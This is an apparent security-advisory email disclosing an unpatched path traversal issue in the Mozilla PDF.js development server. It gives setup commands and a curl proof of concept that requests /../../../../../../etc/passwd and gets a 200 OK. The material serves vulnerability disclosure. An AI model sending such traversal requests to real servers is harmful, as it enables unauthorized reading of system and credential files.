Date: Sat, 24 Nov 2018 13:16:49 +0530
From: Dhiraj Mishra <>
Subject: Path traversal in mozilla PDF.js [Unpatched]

## Summary
A path traversal issue was observed in Mozilla PDF.js, which is a PDF reader
in JavaScript. This issue was observed during code review of PDF.js
(gulpfile.js)(, the Mozilla
team says "The server with pdf.js is intended to be a development server
and should not be exposed to public networks. I suppose we could update the
docs to state that." and an upstream bug was filed against the same (

## Installation
PDF.js is built into version 19+ of Firefox and a Chrome extension is also
available on the Chrome Web Store. To install and get a local copy of PDF.js,
here are the steps:

```
$ git clone
$ cd pdf.js
$ npm install -g gulp-cli
$ npm install
$ gulp server
```

I've used the attribute --path-as-is from cURL to verify this issue.
```
$ curl --path-as-is -v
*   Trying
* Connected to ( port 8888 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host:
> User-Agent: curl/7.58.0
> Accept: */*
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Content-Type: application/octet-stream
< Content-Length: 2745
< Date: Thu, 15 Nov 2018 06:34:32 GMT
< Connection: keep-alive
```

Thank you
Dhiraj (@mishradhiraj_)
